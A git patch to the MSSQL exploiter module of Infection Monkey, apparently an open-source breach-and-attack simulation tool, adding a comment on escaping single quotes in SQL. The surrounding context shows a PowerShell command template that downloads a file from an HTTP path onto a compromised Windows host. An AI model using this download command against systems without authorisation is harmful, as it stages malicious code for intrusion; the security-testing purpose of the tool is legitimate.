From 62cc401981538e499af5ba016a537a11e4c2efaf Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 15 Jun 2022 08:14:29 -0400 Subject: [PATCH] Agent: Add a comment about escaping single quotes in SQL --- monkey/infection_monkey/exploit/mssqlexec.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 7495b38d7..7dbb190a1 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -31,6 +31,8 @@ class MSSQLExploiter(HostExploiter): TMP_FILE_NAME = "tmp_monkey.bat" TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" + # Single quotes are escaped in SQL by using two of them. + # Example: 'It ain''t over ''til it''s over' MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"